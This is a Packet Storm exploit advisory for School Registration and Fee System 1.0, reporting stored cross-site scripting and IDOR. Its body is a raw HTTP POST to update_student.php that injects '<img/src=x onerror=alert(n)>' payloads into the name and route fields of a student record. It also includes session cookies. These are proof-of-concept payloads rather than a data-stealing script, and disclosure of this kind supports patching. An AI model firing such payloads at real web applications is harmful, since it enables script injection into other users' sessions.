School Registration And Fee System 1.0 Cross Site Scripting

2021-04-01T00:00:00
ID PACKETSTORM:162053
Type packetstorm
Reporter Richard Jones
Modified 2021-04-01T00:00:00

Description

                                        
                                            `# Exploit Title: School Registration and Fee System | Multiple Stored Cross Site Scripting   
# Exploit Author: Richard Jones  
# Date: 01-04-2021  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
  
Stored Cross Site Scripting  
  
# Application suffers from multiple stored xss and IDOR Abuse  
  
POST /bilal/update_student.php HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0  
Accept: */*  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 330  
Origin: http://TARGET  
Connection: close  
Referer: http://TARGET/bilal/edit_stud.php?id=3  
Cookie: SSESSaca5a63f4c2fc739381fab7741d68783=xVaP07jLGdxx_p3Qsv1qO_3duBIN1XqSJKxxD4hJFkA; PHPSESSID=iug66hmlf340v2ohlpr1gu6n2l  
  
student_id=3&status=paying&fname=%3Cimg%2Fsrc%3Dx+onerror%3Dalert(1)%3E&mname=%3Cimg%2Fsrc%3Dx+onerror%3Dalert(2)%3E&lname=%3Cimg%2Fsrc%3Dx+onerror%3Dalert(3)%3E&gender=Male&dob=&address=test&student_class=Form+6&transport=yes&route=%3Cimg%2Fsrc%3Dx+onerror%3Dalert(4)%3E&gfname=test&gmname=test&glname=test&rship=test&tel=2131321  
  
  
`